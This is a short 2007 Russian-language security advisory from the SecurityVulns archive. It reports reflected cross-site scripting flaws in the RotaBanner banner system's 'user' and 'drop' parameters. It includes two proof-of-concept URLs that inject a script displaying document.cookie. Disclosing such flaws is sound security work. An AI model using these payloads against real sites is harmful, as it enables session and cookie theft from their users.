Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  SQL MKPortal M1.1 Rc1

  SupportSuite 3.11.01~ Multiple file ~ PHP SELF XSS

  WordPress Charset SQL injection vulnerability (re-resend)

  Advisory: Websense XSS Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:13 декабря 2007 г.
Subject:Vulnerabilities in RotaBanner

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в баннерной системе RotaBanner.

Уязвимости в файле index.html в параметрах user и drop.

XSS:

http://site/account/index.html?user=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/account/index.
html?drop=%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвима версия RotaBanner Local 3 (и предыдущие).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1442/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru